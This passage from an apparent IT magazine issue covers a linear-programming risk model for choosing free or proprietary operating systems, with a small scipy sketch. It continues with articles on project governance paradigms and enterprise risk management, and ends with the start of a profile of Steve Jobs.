X is the vector of unknowns, i.e. the option to choose in this case.
B is the vector of thresholds, i.e. the limits of each constraint according to the discussion in Section 3.2.
To meet the objective of minimizing the objective function Z, this function is expressed as the sum of the products of the cost of each alternative and the value of each alternative (i.e. the unknown X represents what we wish to determine).
Thus, assuming that the cost of a computer with free
software operating system preinstalled is 600 € and the one for proprietary software is 700 €, the objective function is:
Minimize Z = 600 x1 + 700 x2    (3)
Applying the LP simplex method [6], which is essentially a repeated matrix inversion of (2) according to certain
rules, one gets, if it exists, the optimal solution of the problem. That is, the best combination or selection of alternatives to optimize the objective function (3).
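As a hedged illustration of this step, the sketch below restates the data of Table 1 and the 600 €/700 € costs and hands the problem to an off-the-shelf LP solver; scipy's linprog is used here only as a convenient stand-in for the simplex calculation described above.

# Sketch of the LP of Sections 3-4, solved with scipy instead of a hand-run simplex.
import numpy as np
from scipy.optimize import linprog

A = np.array([[0.850, 0.150],    # resistance to change
              [0.160, 0.640],    # dependency
              [0.125, 0.375]])   # lack of security
B = np.array([0.150, 0.160, 0.125])   # thresholds (column B of Table 1)
c = np.array([600.0, 700.0])          # cost in EUR of each alternative (x1, x2)

# linprog expects A_ub x <= b_ub, so the A x >= B constraints are negated.
res = linprog(c, A_ub=-A, b_ub=-B, bounds=[(0, None), (0, None)], method="highs")
print("x1 (free), x2 (proprietary):", res.x)
print("objective value Z:", res.fun)

With these figures the solver returns a larger value for x2 than for x1, in line with the discussion of the optimal solution in Section 5.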
5 Discussion of Results
5.1 Optimal Solution
The optimal solution to the LP problem is as follows:
x1 = 0.125    x2 ≈ 0.292    (4)
We choose the higher value because, although both contribute to obtaining the goal, if only one option is actually
possible it is clear that the one with the higher value contributes more efficiently than the other and therefore is chosen. In the case above, proprietary software (x2) should be
chosen.
In our case both values are very close but since the LP
indicates that the alternative with proprietary software contributes more efficiently to the objective, taking into account risk constraints, it is chosen.
5.2 Dual Problem
Every direct LP problem, such as this one, can be converted into its mirror image, which is called the 'dual problem'.
In the dual problem the columns represent threats while the
rows represent the alternatives. While the direct problem
variables indicate which option contributes best to the goal,
the dual problem variables provide us with the values of
the ‘marginal contributions of each constraint’ or ‘shadow
prices’, which is an economic term. In essence, this means
knowing how much the objective function changes per unit
variation in a constraint, which ultimately gives an idea of
the importance of each constraint.
In this case we obtain the results shown in Table 2.
                 Lack of security   Dependency   Resistance to change
Equal value      0.125              0.207        0.150
Marginal value   1683.333           0.000        458.333
Table 2: Equal Value and Marginal Value.
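The marginal values in Table 2 can be re-derived by solving the dual problem explicitly; the sketch below (again an added illustration, reusing the data and scipy setup of the previous sketch, not the authors' code) maximises B·y subject to Aᵀy ≤ c and prints the resulting shadow prices.

# Dual of the LP above: maximise B.y subject to A^T y <= c, y >= 0.
# linprog minimises, so the objective is passed as -B.
import numpy as np
from scipy.optimize import linprog

A = np.array([[0.850, 0.150],
              [0.160, 0.640],
              [0.125, 0.375]])
B = np.array([0.150, 0.160, 0.125])
c = np.array([600.0, 700.0])

dual = linprog(-B, A_ub=A.T, b_ub=c, bounds=[(0, None)] * 3, method="highs")
print("shadow prices (resistance to change, dependency, lack of security):", dual.x)

Up to rounding, the resulting values match the marginal values of Table 2, with a zero component for the dependency constraint.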
It turns out that the problem of lack of security is the
most decisive in the choice between the alternatives, while resistance to change, which intuitively might be seen as the most decisive, comes in second place. The problem of dependency does not affect the solution since its marginal value is
zero.
This powerful tool allows, for example, a discussion of the cost difference at which the solution, and thus the selection, changes, making the selection of computers with a free software operating system preinstalled more interesting. Moreover, in this case we would observe that the component of inertia fails to be key or even to influence the selection process, and the real criteria for selecting the alternative are, in this case, the security issue first and the problem of dependency second.
6 Conclusions
The use of LP is a new application in the treatment of risks in projects. Its main advantage is that it is possible to represent real world scenarios with some degree of accuracy, as the number of constraints – and alternatives – can be measured in the hundreds. On the other hand, when analyzing the objective function for various scenarios it is possible to infer which is the best option [7].
Another major advantage is that, if there is a solution, it is optimal, i.e. the solution cannot be improved, thus confirming Pareto optimality.
References
[1] M. Fernández-Diego, N. Munier. Bases para la Gestión de Riesgos en Proyectos, 1st ed. Valencia, Spain: Universitat Politècnica de València, 2010.
[2] Project Management Institute. Practice Standard for Project Risk Management. Project Management Institute, 2009.
[3] M. Fernández-Diego, J. Marcelo-Cocho. "Driving IS Projects". In D. Avison et al., eds., Advances in Information Systems Research, Education and Practice. Boston: Springer, pp. 113-124, 2008.
[4] R.M. Stallman. Free Software, Free Society: Selected Essays of Richard M. Stallman. GNU Press, 2002.
[5] International Organization for Standardization. ISO 31000:2009 Risk Management – Principles and Guidelines. International Organization for Standardization, 2009.
[6] G.B. Dantzig. "Maximization of a Linear Function of Variables Subject to Linear Inequalities", 1947. Published pp. 339-347 in T.C. Koopmans (ed.): Activity Analysis of Production and Allocation. New York-London: Wiley & Chapman-Hall, 1951.
[7] N. Munier. A Strategy for Using Multicriteria Analysis in Decision-Making. Springer: Dordrecht, Heidelberg, London, New York, 2011.
Risk Management
Project Governance¹
Ralf Müller
Having a governance structure in organizations provides a framework to guide managers in decision making and action
taking and helps to alleviate the risk of conflicts and inconsistencies between the various means of achieving organizational goals such as processes and resources. This article introduces project governance, a major area of interest in
organizations, which is intended to guide, direct and lead project work in a more successful setting. To that purpose a new
three step governance model is presented and described.
Keywords: Behaviour Control, Framework for Governance, Governance Model for Project Management, Governance Structures, Outcome Control, Project Governance,
Project Management Action, Shareholder Orientation,
Stakeholder Orientation.
Governance starts at the corporate level and provides a
framework to guide managers in their daily work of decision making and action taking. At the level of projects governance is often implemented through defined policies, processes, roles and responsibilities, which set the framework
for peoples’ behaviour, which, in turn, influences the project.
Governance sets the boundaries for project management
action, by
• Defining the objectives of a project. These should be derived from the organization's strategy and clearly outline the specific contribution a project makes to the achievement of the strategic objectives.
• Providing the means to achieve those objectives. This is the provision of or enabling the access to the resources required by the project manager.
• Controlling progress. This is the evaluation of the appropriate use of resources, processes, tools, techniques and quality standards in the project.
Without a governance structure, an organization runs
the risk of conflicts and inconsistencies between the various means of achieving organizational goals, such as processes and resources, thereby causing costly inefficiencies
that negatively impact both smooth running and bottom line
profitability.
Approaches to governance vary by the particularities of
organizations. Some organizations are more shareholder
oriented than others, thus aim mainly for Return on Invest-
Author
Ralf Müller, PhD, is Professor of Business Administration at
Umeå University, Sweden, and Professor of Project Management
at BI Norwegian Business School, Norway. He lectures and
researches in governance and management of projects, as well
as in research methodologies. He is the (co)author of more than
100 publications and received, among others, the Project
Management Journal’s 2009 Paper of the Year, 2009 IRNOP’s
best conference paper award, and several Emerald Literati
Network Awards for outstanding journal papers and referee work.
He holds an MBA degree from Heriot Watt University and a
DBA degree from Henley Management College, Brunel
University, U.K. Before joining academia he spent 30 years in
the industry consulting large enterprises and governments in 47
different countries for their project management and governance.
He also held related line management positions, such as the
Worldwide Director of Project Management at NCR Teradata.
<[email protected]>
ment for their shareholders (i.e. having a shareholder orientation), while others try to balance a wider set of objectives,
including societal goals or recognition as preferred employer
(i.e. having a stakeholder orientation). Within this continuum, the work in organizations might be controlled
through compliance with existing processes and procedures
(i.e. behaviour control), or by ensuring that work outcomes
meet expectations (i.e. outcome orientation). Four governance paradigms derive from that and are shown in Figure 1.
Figure 1: Four Project Governance Paradigms – Behaviour Control vs. Outcome Control crossed with Shareholder Orientation vs. Stakeholder Orientation, giving the Conformist, Flexible Economist, Agile Pragmatist and Versatile Artist paradigms.
The Conformist paradigm emphasizes compliance with
existing work procedures to keep costs low. It is appropriate when the link between specific behaviour and project
outcome is well known. The Flexible Economist paradigm
is more outcomes-focused requiring a careful selection of
project management methodologies etc. in order to ensure
economic project delivery. Project managers in this paradigm must be skilled, experienced and flexible and often
work autonomously to optimize shareholder returns through
professional management of their projects. The Versatile
Artist paradigm maximizes benefits by balancing the diverse
set of requirements arising from a number of different
stakeholders and their particular needs and desires. These
project managers are also very skilled, experienced and work
autonomously, but are expected to develop new or tailor
existing methodologies, processes or tools to economically
balance the diversity of requirements. Organizations using
this governance paradigm possess a very heterogeneous set
of projects in high technology or high risk environments.
The Agile Pragmatist paradigm is found when maximization
of technical usability is needed, often through a time-phased
approach to the development and product release of functionality over a period of time. Products developed in projects
under this paradigm grow from a core functionality, which
is developed first, to ever increasing features, which although
of a lesser and lesser importance to the core functionality,
enhance the product in flexibility, sophistication and ease of use. These projects often use Agile/Scrum methods, with
the sponsor prioritising deliverables by business value over
a given timeframe.
Larger enterprises often apply different paradigms to
different parts of their organization. Maintenance organizations are often governed using the conformist or economist paradigms, while R&D organizations often use the versatile artist or agile pragmatist approach to project governance.
Governance is executed at all layers of the organizational hierarchy or in hierarchical relationships in organizational networks. It starts with the Board of Directors,
which defines the objectives of the company and the role
of projects in achieving these objectives. This implies decisions about the establishment of steering groups and
Project Management Offices (PMOs) as additional governance institutions. The former are often responsible for
the achievement of the project’s business case through direct governance of the project, by setting goals, providing
resources (mainly financial) and controlling progress. The
latter (the PMOs) are set up in a variety of structures and
mandates, in order to solve particular project related issues
within the organization. Some PMOs focus on more tactical tasks, like ensuring compliance of project managers with
existing methodologies and standards. That supports governance along the behaviour control paradigms. Other PMOs
are more strategic in nature and perform stewardship roles
in project portfolio management and foster project management within the organization thereby supporting governance
along the outcome control paradigms. A further governance
task of the Board of Directors is the decision to adopt programme and/or portfolio management as a way to manage
the many projects simultaneously going on in an organization. Programme management is the governing body of the
projects within its programme, and portfolio management
the governing body of the groups of projects and programmes that make up the organization. They select and
prioritize the projects and programmes and with it their staffing.
Figure 2: Framework for Governance of Project, Program and Portfolio Management.
Figure 3: Model of Project Governance.
How Much Project Management is enough for my
Organization?
This is addressed through governance of project management. Research showed that project-oriented companies
balance investments and returns in project management
through careful implementation of measures that address the
three forces that make them successful. These forces are
(see also Figure 2):
a) educated project managers. This determines what can
be done;
b) higher management demanding professionalism in
project management. This determines what should be done;
and,
c) control of project management execution. This
shows what is done in an organization in terms of project
management.
Companies economize the investments in project management by using a three step process to migrate from process orientation to project orientation. Depending on their
particular needs they stop migration at step 1, 2 or 3 when
they have found the balance between investments in project
management (and improved project results) in relation to
the percentage of their business that is based on projects.
Organizations with only a small portion of their business
based on projects should invest less, and project-based organizations invest more in order to gain higher returns from
their investments. The three steps are (see also Figure 2):
Step 1: Basic training in project management, use of
steering groups, and audits of troubled projects. This
relatively small investment yields small returns and is appropriate for businesses with very few activities in projects.
Step 2: All of Step 1 plus project manager certification,
establishment of PMO, and mentor programs for project
managers. This medium level of investment yields higher
returns in terms of better project results and is appropriate
for organizations with a reasonable amount of their business being dependent on projects.
Step 3: All of step 1 and 2 plus advanced training and
certification, benchmarking of project management capabilities, and use of project management maturity models.
This highest level of investment yields the highest returns
through better project results and is appropriate for project-based organizations, or organizations whose results are significantly determined by their projects.
The same concept applies for programme and portfolio
management. This allows the tailoring of efforts for governance of project, program and portfolio management to
the needs of the organization. By achieving a balance of
return and investment through the establishment of the three
elements of each step, organizations can become mindful of
their project management needs. Organizations can stop at
each step, after they have reached the appropriate amount
of project management for their business.
How does All that link together in an Organization?
The project governance hierarchy from the board of directors, via portfolio and program management, down to
steering groups is linked with governance of project management through the project governance paradigm (see Figure 3).
A paradigm such as the Conformist paradigm supports
project management approaches as described above in Step
1 of the three step governance model for project management, that is, methodology compliance, audits and steering
group observation. A Versatile Artist paradigm, on the other
hand, will foster autonomy and trust in the project manager,
and align the organization towards a ‘project-way-of-working’, where skilled and flexible project managers work autonomously on their projects.
The paradigm is set by management and the nature of
the business the company is in. The project governance paradigm influences the extent to which an organization implements steps 1 to 3 of the governance model for project management. It then synchronizes these project management
capabilities with the level of control and autonomy needed
for projects throughout the organization. This then becomes
the tool for linking capabilities with requirements in accordance with the wider corporate governance approach.
¹ This article was previously published online in the "Advances in Project Management" column of PM World Today (Vol. XII Issue III - March 2010), <http://www.pmworldtoday.net/>. It is republished with all permissions.
Risk Management
Five Steps to Enterprise Risk Management
Val Jonas
With the changing business environment brought on by events such as the global financial crisis, gone are the days of
focussing only on operational and tactical risk management. Enterprise Risk Management (ERM), a framework for a
business to assess its overall exposure to risk (both threats and opportunities), and hence its ability to make timely and
well informed decisions, is now increasingly becoming the norm. Ratings agencies, such as Standard & Poor's, are reinforcing this shift towards ERM by rating the effectiveness of a company's ERM strategy as part of their overall credit
assessment. This means that, aside from being best practice, not having an efficient ERM strategy in place will have a
detrimental effect on a company’s credit rating. Not only do large companies need to respond to this new focus, but also
the public sector needs to demonstrate efficiency going forward, by ensuring ERM is embedded not only vertically but also
horizontally across their organisations. This whitepaper provides help, in the form of five basic steps to implementing a
simple and effective ERM solution.
Keywords: Enterprise Risk Management, Enterprise
Risk Map, Enterprise Risk Reporting, Enterprise Risk Structure, ERM, ERM Strategy, Horizontal Enterprise Risk Management, Left Shift, Risk Relationships, Scoring Systems,
Vertical Enterprise Risk Management, Vertical Management
Chain.
1 Introduction
With the changing business environment brought on by
events such as the global financial crisis, gone are the days
of focussing only on operational and tactical risk management. Enterprise Risk Management (ERM), a framework
for a business to assess its overall exposure to risk (both
threats and opportunities), and hence its ability to make
timely and well informed decisions, is now the norm.
Ratings agencies, such as Standard & Poor's, are reinforcing this shift towards ERM by rating the effectiveness
of a company’s ERM strategy as part of their overall credit
assessment. This means that, aside from being best practice,
not having an efficient ERM strategy in place will have a
detrimental effect on a company’s credit rating.
Not only do large companies need to respond to this new
focus, but also the public sector needs to demonstrate efficiency going forward, by ensuring ERM is embedded not
only vertically but also horizontally across their organisations (Figure 1). This whitepaper1 provides help, in the form
of five basic steps to implementing a simple and effective
ERM solution.
2 Five Steps to implementing a Simple and Effective ERM Solution
The five steps to implementing a simple and effective
ERM solution are explained in this section.
Author
Val Jonas is a highly experienced risk management expert, with
extensive experience of training, facilitating and implementing
project, programme and strategic risk management systems for
companies in a wide range of industries in the UK, Europe,
USA and Australia. With more than 18 years experience in risk
management and analysis, working with large organisations,
Val has a wealth of practical experience and vision on how
organisations can improve project and business performance
through their risk management strategic framework and good
practice. Val played a major part in the design and development
of the leading Risk Management and Analysis software product
Predict!. More recently, she has pioneered Governance and Risk
Management Master Class sessions for senior management in
industry and government and has been a keen and active
participant in forging the interfacing of Risk and Earned Value
Management, including speaking at international conferences
on these topics. She has a joint honors BA in Mathematics and
Computing from Oxford University. <[email protected]>.
About Risk Decisions
Risk Decisions Limited is part of Risk Decisions Group, a
pioneering global risk management solutions company, with
offices in the UK, USA and Australia. The company specialises
in the development and delivery of enterprise solutions and
services that enable risk to be managed more effectively on
large capital projects as well as helping users to meet strategic
business objectives and achieve compliance with corporate
governance obligations. Clients include Lend Lease, Mott
MacDonald, National Grid, Eversholt Rail, BAE Systems, Selex
Galileo, Raytheon, Navantia, UK MoD, Australian Defence
Materiel Organisation and New Zealand Air Force.
1
This is first of a series of whitepapers on Enterprise Risk Management. Future papers will expand on each of the steps in this white
paper as well as continuing to cover Governance and Compliance.
Figure 1: Vertical and Horizontal ERM.
Figure 2: Enterprise Risk Structure in the Predict! Hierarchy Tree.
Figure 3: Vertical Management Chain of Owners and Leaders.
Step 1 – Establish an Enterprise Risk Structure
ERM requires the whole organisation to identify, communicate and proactively manage risk, regardless of position or perspective. Everyone needs to follow a common
approach, which includes a consistent policy and process, a
single repository for their risks and a common reporting format. However, it is also important to retain existing working practices based on localised risk management perspectives as these reflect the focus of operational risk management.
Figure 4: Global Categories.
The corporate risk register will look different from the
operational risk register, with a more strategic emphasis on
risks to business strategy, reputation and so on, rather than
more tactical product, contract and project focused risks.
The health and safety manager will identify different kinds
of risks from the finance manager, while asset risk management and business continuity are disciplines in their own
right. ERM brings together risk registers from different disciplines, allowing visibility, communication and central reporting, while maintaining distributed responsibility.
In addition to the usual vertical risk registers, such as
corporate, business units, departments, programmes and
projects, the enterprise also needs horizontal, or functional
risk registers. These registers allow function and business
managers, who are responsible for identifying risks to
their own objectives, to identify risks arising from other
areas of the organisation.
The enterprise risk structure (Figure 2) should match
the organisation's structure: the hierarchy represents vertical (executive) as well as horizontal (functional and business) aspects of the organisation. This challenges the conventional assumption that risks can be rolled up automatically, by placing horizontal structures side by side with vertical executive structures. Risks should be aggregated using a combination of vertical structure and horizontal intelligence. This is a key factor in establishing ERM.
Figure 5: Scoring by Cluster Maps from Local to Enterprise Level.
Figure 6: Metrics Reports by Business Objective, Cluster and Supplier.
Figure 7: Robust Risk Information for Decision-making.
Step 2 – Assign Responsibility
Once an appropriate enterprise risk structure is established, assigning responsibility and ownership should be
straightforward. Selected nodes in the structure will have
specified objectives; each will have an associated manager
(executive, functional or business), who will be responsible
for achieving those objectives and managing the associated
risks. Each node containing a set of risks, along with its
owner and leader, is a Risk Management Cluster. (See Figure 3.)
Vertical managers take executive responsibility not only
for their cluster risk register, but also overall leadership responsibility for the Risk Management Clusters² below. Responsibility takes two forms: ownership at the higher level
and leadership at the lower level. For example, a programme
manager will manage his programme risks, but also have
responsibility for overseeing risk within each of the programme’s projects.
Budgetary authority (setting and using Management
Reserve), approval of risk response actions, communication of risk appetite, management reporting and risk performance measures are defined as part of the Owner and
Leader roles as illustrated in Figure 3. This structure is also
used to escalate and delegate risks.
² Risk Management Clusters® are unique to the Predict! risk management software.
Horizontal managers take responsibility for their own
functional or business Risk Management Clusters, but also
for gathering risks from other areas of the Enterprise Risk
Structure related to their discipline. For example, the HR
functional manager will be responsible for identifying common skills shortfall risks to bring them under central management. Similarly, the business continuity manager will
identify all local risks relating to use of a test facility and
manage them under one site management plan. To assist in
this, we use an enterprise risk map – see Step 3.
Step 3 – Create an Enterprise Risk Map
Risk budgeting and common sense dictates that risks
should reside at their local point of impact, because this is
where attention is naturally focused. However, the risk
cause, mitigation or exploitation strategy may come from
elsewhere in the organisation and often common causes and
actions can be identified. In this case, we take a systemic
approach, where risks are managed more efficiently when
brought together at a higher level. To achieve this, we need
to be able to map risks to different parts of the risk management structure.
To create an enterprise risk map, you need:
• a set of global categories to communicate information to the right place
• the facility to define the relationships between risks (parent, child, sibling, etc.)
• scoring systems with consistent common impact types
Global Categories
Functional and business managers should use these global categories to map risks to common themes, such as strategic or business objectives, functional areas and so on.
These categories then provide ways to search and filter on
these themes and to bring common risks together under a
parent risk. (See Figure 4).
Risk Relationships
For example, if skills shortage risks are associated with
HR, the HR manager can easily call up a register of all the
HR risks, regardless of project, contract, asset, etc. across
the organisation and manage them collectively.
Similarly, the impact of a supplier failing on any one
contract may be manageable, but across many contracts it could be a major business risk. In that case, the supply
chain function needs to bring the risks against this supplier
together and to manage the problem centrally.
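A toy sketch of this idea is given below; the register names, risk titles and category labels are invented for illustration and are not the Predict! data model, but they show how a global category lets the HR or supply chain function pull related risks out of registers held elsewhere in the enterprise structure.

# Illustrative only: grouping risks from several registers by global category.
from collections import defaultdict

risk_registers = {
    "Project Alpha":  [{"title": "Key developer may leave",       "categories": {"HR"}},
                       {"title": "Supplier X delivers late",      "categories": {"Supplier X"}}],
    "Contract Beta":  [{"title": "Shortage of test engineers",    "categories": {"HR"}},
                       {"title": "Supplier X becomes insolvent",  "categories": {"Supplier X"}}],
    "Corporate":      [{"title": "Reputation damage from breach", "categories": {"Reputation"}}],
}

by_category = defaultdict(list)
for register, risks in risk_registers.items():
    for risk in risks:
        for category in risk["categories"]:
            by_category[category].append((register, risk["title"]))

# The HR manager or the supply chain function now gets one consolidated view.
print(by_category["HR"])
print(by_category["Supplier X"])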
Each Risk Management Cluster will include both global and local categories in a Predict! Group, so that each
area of the organisation needs only to review relevant information.
Scoring systems are also applied by Risk Management
Cluster, with locally meaningful High, Medium and Low
thresholds which map automatically when rolled up (Figure 5). For example, a High impact of £150k at project or
contract level will appear as Low at corporate level. Whereas
a £5m risk at a project or contract level may appear as High
at the corporate level.
Typically, financial and reputation impacts will be common to all clusters, whereas local impacts, such as project
schedule, will not be visible higher up.
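The sketch below illustrates this kind of threshold mapping; apart from the £150k and £5m examples quoted above, the threshold figures are assumptions chosen only to make the point that the same financial impact can score differently at project and corporate level.

# Illustrative threshold mapping: the same impact rated against two scoring scales.
def rate(impact_gbp, thresholds):
    """Return 'High', 'Medium' or 'Low' for an impact given (medium, high) thresholds."""
    medium, high = thresholds
    if impact_gbp >= high:
        return "High"
    if impact_gbp >= medium:
        return "Medium"
    return "Low"

project_scale = (50_000, 150_000)         # assumed project/contract-level thresholds
corporate_scale = (1_000_000, 5_000_000)  # assumed corporate-level thresholds

for impact in (150_000, 5_000_000):
    print(f"GBP {impact:>9,}: project = {rate(impact, project_scale)}, "
          f"corporate = {rate(impact, corporate_scale)}")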
Step 4 – Decision Making through Enterprise Risk
Reporting
The most important aspect of risk management is carrying out appropriate actions to manage the risks. However, you cannot manage every identified risk, so you need
to prioritise and make decisions on where to focus management attention and resources. The decision making process is underpinned by establishing risk appetite against objectives and setting a baseline, both of which should be
recorded against each Risk Management Cluster®.
Enterprise-wide reporting allows senior managers to review risk exposure and trends across the organisation. This
is best achieved through metrics reports, such as the risk
histogram (see Figure 6). For example, you might want to
review the risk to key business objectives by cluster. Or
how exposed different contracts and projects are to various
suppliers.
Furthermore, there is a need to use a common set of
reports across the organisation, to avoid time wasted interpreting unfamiliar formats (Figure 7). Such common reports ensure the risk is communicated and well understood
by all elements of the organisation, and hence provide timely
information on the current risk position and trends, initially
top-down, then drilling down to the root cause.
Step 5 – Changing Culture from Local to Enterprise
At all levels of an organisation, changing the emphasis
Figure 8: Proactive Management of Risks – looking ahead.
from ‘risk management’ to ‘managing risks’ is a challenge;
however, across the enterprise it is particularly difficult. It
requires people to look ahead and take action to avert (or
exploit) risk to the benefit of the organisation. It also requires the organisation to encourage and reward this change
in emphasis!
Unfortunately, problem management (fire-fighting) deals
with today’s problems at the expense of future ones. This is
generally a far more expensive process as the available remedies are limited. However, if potential problems are identified (as risks) before they arise, you have far more options
available to effect a 'Left Shift': from a costly and overly long process to one better matching the original objectives set! (See Figure 8.)
Most organisations have pockets of good risk management, many have a mechanism to report ‘top N’ risks vertically, but very few have started to implement horizontal,
functional or business risk management. Both a bottom-up and a top-down approach are required. An ERM initiative should
allow good local practices to continue, provided they are in
line with enterprise policy and process (establishing each
pocket of good risk management as a Risk Management
Cluster will provide continuity).
From a top-down perspective, functional and business
focused risk management needs to be kick started. A risk
steering group comprising functional heads and business
managers is a good place to start. The benefits of such a
group getting together to understand inter-discipline risk
help break down stove-piped processes. This can trigger
increasingly relaxed cross-discipline discussions and focus
on aligning business and personal objectives that leads to
rapid progress on understanding and managing risk.
Finally, to ensure that an organisational culture shift is
effected, senior management must be engaged. This engagement is not only aimed at encouraging them to see the
benefits of managing risk, but to also help the organisation
as a whole see that proactive management of risk (the Left
Shift principle) is valued by all.
A Risk Management MasterClass for the executive board
and senior managers can provide them with the tools necessary to progress an organisation towards effective ERM.
3 The Benefits
ERM delivers confidence, stability, improved performance and profitability. It provides:
• Access to risk information across the organisation in real time
• Faster decision making and less 'fire fighting'
• Fewer surprises (managed threats and successful opportunities)
• Improved confidence and trust across the stakeholder community
• Reduced cost, better use of resources and improved morale
• Stronger organisations resilient to change, ready to exploit new opportunities
Over time this will:
• Increase customer satisfaction, enhance reputation and generate new business
• Safeguard life, company assets and the environment
• Achieve best value and maximise profits
• Maintain credit ratings and lower finance costs
4 Summary
All of the risk management skills and techniques required to implement Enterprise Risk Management can easily be learned and applied. From senior managers to risk
practitioners, Masterclasses, training, coaching and process definition can be used to support rollout of Enterprise
Risk Management.
Create a practical Enterprise Risk Structure, set clear
responsibilities and hold people accountable. Define a simple risk map and provide localised working practices to
match perspectives on risk. Be seen to make decisions based
on good risk management information.
Enterprise Risk Management should be simple to
understand and simple to implement.
Keep it simple! Make it effective!
Bibliography
• AS/NZS 4360:2004 Risk Management. SAI Global Ltd, ISBN 0-7337-5904-1, 2004.
• Association for Project Management. Project Risk Analysis and Management Guide, Second Edition. Association for Project Management, ISBN 1-903494-12-5, 2004.
• COSO. Enterprise Risk Management – Integrated Framework. AICPA, 2004.
• Office of Government Commerce. Management of Risk: Guidance for Practitioners. The Stationery Office, ISBN-13: 9780113310388, 2007.
• Project Management Institute. Practice Standard for Project Risk Management. Project Management Institute, 2009.
• ISO 31000:2009 Risk Management – Principles and Guidelines. ISO, <http://www.iso.org>, 2009.
• ISO/FDIS 31000:2009.
• ISO Guide 73 – Risk Management – Vocabulary.
Note: All of these publications are listed at <http://www.riskdecisions.com>.
Glossary
Note: Where ‘source’ is in brackets, minor amendments have been
incorporated to the original definition.
Budget: The resource estimate (in £/$s or hours) assigned for the accomplishment of a specific task or group of tasks.
Change Control (Management): Identifying, documenting, approving or rejecting and controlling change.
Control Account: A management control point at which actual costs can be accumulated and compared to earned value and budgets (resource plans) for management control purposes. A control account is a natural management point for budget/schedule planning and control since it represents the work assigned to one responsible organisational element on one Work Breakdown Structure (WBS) element.
Cost Benefit Analysis: The comparison of costs before and after taking an action, in order to establish the saving achieved by carrying out that action.
Cost Risk Analysis: Assessment and synthesis of the cost risks and/or estimating uncertainties affecting the project to gain an understanding of their individual significance and their combined impact on the project's objectives, to determine a range of likely outcomes for project cost.
Enterprise Risk Map: The structure used to consolidate risk information across the organisation, to identify central responsibility and common response actions, with the aim of improving top down visibility and managing risks more efficiently.
Enterprise Risk Management (ERM): The application of risk management across all areas of a business, from contracts, projects, programmes, facilities, assets and plant, to functions, financial, business and corporate risk.
Left Shift: The practice by which an organisation takes proactive action to mitigate risks when they are identified rather than when they occur, with the aim of reducing cost and increasing efficiency.
Management Reserve (MR): Management Reserve may be subdivided into: Specific Risk Provision to manage identifiable and specific risks; Non-Specific Risk Provision to manage emergent risks; and Issues Provision.
Non-specific Risk Provision: The amount of budget / schedule / resources set aside to cover the impact of emergent risks, should they occur.
Operational Risk: The different types of risks managed across an organisation, typically excluding financial and corporate risks.
Opportunity: An 'upside', beneficial Risk Event.
Baseline: An approved scope/schedule/budget plan for work, against which execution is compared, to measure and manage performance.
Performance Measurement: The objective measurement of progress against the Baseline.
Proactive Risk Response: An action or set of actions to reduce the probability or impact of a threat or increase the probability or impact of an opportunity. If approved they are carried out in advance of the occurrence of the risk. They are funded from the project budget.
Reactive Risk Response: An action or set of actions to be taken after a risk has occurred in order to reduce or recover from the effect of the threat or to exploit the opportunity. They are funded from Management Reserve.
Risk Appetite: The amount of risk exposure an organisation is willing to accept in connection with delivering a set of objectives.
Risk Event: An uncertain event or set of circumstances, that should it or they occur, would have an effect on the achievement of one or more objectives.
Risk Exposure: The difference between the total impact of risks should they all occur and the Risk Provision.
Risk Management Clusters: Functionality in Risk Decisions' Predict! risk management software that enables users to organise different groups of risks to form a single, enterprise-wide risk map.
Risk Provision: The amount of budget / schedule / resources set aside to manage the impact of risks. Risk Provision is a component part of Management Reserve.
Risk Response Activities: Activities carried out to implement a Proactive Risk Response.
Schedule Risk Analysis: Assessment and synthesis of schedule risks and/or estimating uncertainties affecting the project to gain an understanding of their individual significance and their combined impact on the project's objectives, to determine a range of likely outcomes for the project schedule.
Sources: Risk Decisions, PMBoK, PRAM, APM EVM Guideline, and the APM EV/Risk Working Group.
UPENET
Information Society
Steve Jobs
Dragana Stojkovic
© 2011 JISA
This paper was first published, in English, by inforeview, issue 5/2011, pp. 58-63. inforeview, a UPENET partner, is a publication
from the Serbian CEPIS society JISA (Jedinstveni informatički savez Srbije – Serbian Information Technology Association). The 5/
2011 issue of inforeview can be accessed at <http://www.emagazine.inforeview.biz/si9/index.html>.
Note: Abstract and keywords added by UPGRADE.
This paper offers a review of the role played by the late Steve Jobs in the development and commercialization of trendy and
innovative IT devices (Mac computer, iPod, iPhone, iPad) that have greatly influenced the daily lives of hundreds of
millions of people around the world.
Keywords: Apple, Innovation, IT
Devices, Steve Jobs.
Although many considered him to be the best innovator in the technological world, Steve Jobs was never so much a skilled engineer as someone able to recognize a good idea and do everything necessary to realize it and bring it to perfection. He himself honoured his long-time partner Steve
Wozniak, with whom he founded the
company Apple Computer, for his ingenious engineering skills. However,
although Steve Wozniak was the man
who was the most responsible for the
construction of the first revolutionary
computer Apple I, as he said, the idea
of selling them never crossed his mind
at the time. Jobs was the one who gathered resources, organized production,
and assembled a great team of successful managers.
After the success of the Apple II, the next generation of the computer, the inventor of the famous Macintosh computer (also known as the Mac), Jef Raskin, insisted that the Apple team, led by Jobs, visit the company Xerox PARC, which was working on the greatest innovations of that time at its premises – the graphical user interface and the computer mouse. However, what the people at Xerox did not know was how to realize their idea, and how to preserve it. Recognizing the ingeniousness of these creations, Jobs immediately made his team work on implementing the idea in the next generations of Apple computers, Lisa and Macintosh.
When mentioning the Macintosh, it is hard to find a tech-savvy person or a marketing expert who has not heard of "1984", the famous commercial with which this computer was presented in the
Author
Dragana Stojkovic has a Bachelor
Degree in Philology, English language
and literature branch, at the University
of Belgrade, Serbia. She is a free lance
journalist and English translator.
<[email protected]>
USA during the Super Bowl in 1984.
What is less known is that the Board
of Directors did not like the commercial at all, and that Jobs was the one
who supported the project until its very
realization. After the premiere broadcast, all three major TV networks of the time and around 50 local TV stations broadcast reports about
the commercial, and hundreds of newspapers and magazines wrote about it,
providing publicity worth 5 million
dollars for free.
After the dispute within the company, Jobs left Apple and founded his
own computer company called NeXT.
When 12 years later Apple bought
NeXT and brought Jobs back, what he
found was a company that was slowly
dying since major companies such as
Microsoft, IBM, and Dell had produced the same machines as Apple did,
but at a lower cost and with faster processors. Visiting Apple's premises, Jobs found, in a basement across from the main building, a designer who was sitting among a bunch of prototypes and thinking about quitting. Among the prototypes he had been working on was a monolithic monitor with soft edges and integrated components. In that room Jobs saw what other managers had missed. Almost
immediately, he said to the designer,
Jonathan Ive, that from that moment
on, they would be working on a new
line of computers. That was when the
first iMacs were born.
